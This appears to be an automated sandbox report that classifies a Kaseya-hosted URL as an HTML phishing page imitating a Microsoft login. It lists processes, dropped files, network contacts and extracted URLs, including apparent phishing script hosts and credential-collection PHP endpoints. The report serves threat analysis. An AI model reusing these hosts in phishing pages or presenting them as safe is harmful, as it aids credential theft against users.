Analysis Report https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

Overview

General Information

Sample URL:https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d
Analysis ID:356753

Detection

HTMLPhisher
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish_10

Classification

Startup

  • System is w10x64
  • iexplore.exe (PID: 5116 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6480 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 6544 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security | -
C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security | -

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Phishing:

Yara detected HtmlPhish_10
Source: Yara match; File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html, type: DROPPED
Source: Yara match; File source: C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial, type: DROPPED

      Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49745 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown; DNS traffic detected: queries for: bms.kaseya.com
Source: actions[1].js.6.dr; String found in binary or memory: http://logo.clearbit.com/
Source: popper.min[1].js.6.dr; String found in binary or memory: http://opensource.org/licenses/MIT).
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand
Source: style[1].css.6.dr; String found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
Source: GetFile[1].htm.3.dr; String found in binary or memory: https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWd
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://code.jquery.com/jquery-3.3.1.slim.min.js
Source: bootstrap.min[1].js.6.dr; String found in binary or memory: https://getbootstrap.com/)
Source: bootstrap.min[1].js.6.dr; String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: bootstrap.min[1].js.6.dr; String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: actions[1].js.6.dr; String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://manmedia.org/offic/n.page/actions.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://manmedia.org/offic/n.page/jqueryLib.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://manmedia.org/offic/n.page/style.css
Source: style[1].css.6.dr; String found in binary or memory: https://my.navyfederal.org/NFOAA_Auth/resources/img/css/img-billboard-BG.svg);
Source: style[1].css.6.dr; String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log
Source: style[1].css.6.dr; String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi
Source: style[1].css.6.dr; String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://tuicura.com/offic/next2.php
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://tuicura.com/offic/nexxt.php
Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://www.google.com/s2/favicons?sz=16&domain_url=
Source: actions[1].js.6.dr, 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://www.google.com/s2/favicons?sz=32&domain_url=
Source: actions[1].js.6.dr, 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr; String found in binary or memory: https://www.google.com/s2/favicons?sz=64&domain_url=
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown; Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown; Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown; Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown; Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown; Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown; Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown; Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engine; Classification label: mal48.phis.win@11/32@9/5
Source: C:\Program Files\internet explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{835A355E-7633-11EB-90E5-ECF4BB2D2496}.dat
Source: C:\Program Files\internet explorer\iexplore.exe; File created: C:\Users\user\AppData\Local\Temp\~DF08A6A974461167F6.TMP
Source: C:\Program Files\internet explorer\iexplore.exe; File read: C:\Users\desktop.ini
Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
Source: unknown; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
Source: unknown; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe; Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
Source: Window Recorder; Window detected: More than 3 window changes detected

MITRE ATT&CK Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: Masquerading (1); Process Injection (1); Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: File and Directory Discovery (1); Application Window Discovery; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Command and Control: Encrypted Channel (2); Non-Application Layer Protocol (1); Application Layer Protocol (2)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data

      Behavior Graph

Behavior Graph ID: 356753
URL: https://bms.kaseya.com/Comm...
Start date: 23/02/2021
Architecture: WINDOWS
Score: 48
Signature: Yara detected HtmlPhish_10
Process tree: iexplore.exe started two iexplore.exe children; the second of these started three further iexplore.exe processes
Dropped files: 46f3fddd-165c-4cd8...tml.a41uhm1.partial (HTML); 46f3fddd-165c-4cd8...36cd19deef5[1].html (HTML)
DNS/IP: origin-bms.kaseya.com 52.144.52.222:443 (local ports 49719, 49720), STRATOGENGB, United States; bms.kaseya.com; manmedia.org 204.93.216.87:443 (local ports 49737, 49738), SERVERCENTRALUS, United States; cs1100.wpc.omegacdn.net 152.199.23.37:443 (local ports 49744, 49745), EDGECASTUS, United States; 6 other IPs or domains

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d | 0% | Avira URL Cloud | safe

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label
https://manmedia.org/offic/n.page/actions.js | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand | 0% | Avira URL Cloud | safe
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log | 0% | Avira URL Cloud | safe
https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s | 0% | Avira URL Cloud | safe
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand | 0% | Avira URL Cloud | safe
https://tuicura.com/offic/next2.php | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand | 0% | Avira URL Cloud | safe
https://manmedia.org/offic/n.page/jqueryLib.js | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand | 0% | Avira URL Cloud | safe
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi | 0% | Avira URL Cloud | safe
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log | 0% | Avira URL Cloud | safe
https://tuicura.com/offic/nexxt.php | 0% | Avira URL Cloud | safe
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7 | 0% | Avira URL Cloud | safe
https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand | 0% | Avira URL Cloud | safe
https://manmedia.org/offic/n.page/style.css | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cs1100.wpc.omegacdn.net | 152.199.23.37 | true | false | - | unknown
cdnjs.cloudflare.com | 104.16.19.94 | true | false | - | high
origin-bms.kaseya.com | 52.144.52.222 | true | false | - | high
manmedia.org | 204.93.216.87 | true | false | - | unknown
stackpath.bootstrapcdn.com | unknown | unknown | false | - | high
bms.kaseya.com | unknown | unknown | false | - | high
code.jquery.com | unknown | unknown | false | - | high
aadcdn.msftauth.net | unknown | unknown | false | - | unknown
ajax.aspnetcdn.com | unknown | unknown | false | - | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
0 | true | - | low

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://manmedia.org/offic/n.page/actions.js | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | - | high
https://my.navyfederal.org/NFOAA_Auth/resources/img/css/img-billboard-BG.svg); | style[1].css.6.dr | false | - | high
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201 | actions[1].js.6.dr | false | - | high
https://code.jquery.com/jquery-3.3.1.slim.min.js | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | - | high
https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWd | GetFile[1].htm.3.dr | false | - | high
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://getbootstrap.com/) | bootstrap.min[1].js.6.dr | false | - | high
https://tuicura.com/offic/next2.php | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://manmedia.org/offic/n.page/jqueryLib.js | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | - | high
https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://github.com/twbs/bootstrap/graphs/contributors) | bootstrap.min[1].js.6.dr | false | - | high
https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
http://logo.clearbit.com/ | actions[1].js.6.dr | false | - | high
https://github.com/twbs/bootstrap/blob/master/LICENSE) | bootstrap.min[1].js.6.dr | false | - | high
https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://tuicura.com/offic/nexxt.php | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | - | high
http://opensource.org/licenses/MIT). | popper.min[1].js.6.dr | false | - | high
https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7 | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown
https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand | style[1].css.6.dr | false | Avira URL Cloud: safe | unknown
https://manmedia.org/offic/n.page/style.css | 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.dr | false | Avira URL Cloud: safe | unknown

                                                  Contacted IPs

                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
204.93.216.87 | unknown | United States | 23352 | SERVERCENTRALUS | false
152.199.23.37 | unknown | United States | 15133 | EDGECASTUS | false
52.144.52.222 | unknown | United States | 50292 | STRATOGENGB | false
104.16.19.94 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:356753
                                                  Start date:23.02.2021
                                                  Start time:16:01:11
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 5m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:27
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal48.phis.win@11/32@9/5
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.211.6.115, 104.43.193.48, 168.61.161.212, 88.221.62.148, 209.197.3.24, 209.197.3.15, 152.199.19.160, 216.58.212.170, 142.250.185.164, 51.11.168.160, 152.199.19.161, 2.20.142.209, 2.20.142.210, 51.103.5.186, 52.155.217.156, 92.122.213.247, 92.122.213.194, 20.54.26.129, 184.30.20.56
                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cds.s5x3j6q5.hwcdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, mscomajax.vo.msecnd.net, audownload.windowsupdate.nsatc.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, cs22.wpc.v0cdn.net, ajax.googleapis.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, aadcdnoriginneu.azureedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, aadcdnoriginneu.ec.azureedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, cds.j3z9t3p6.hwcdn.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • VT rate limit hit for: https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

                                                  Simulations

                                                  Behavior and APIs

                                                  No simulations

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{835A355E-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):32344
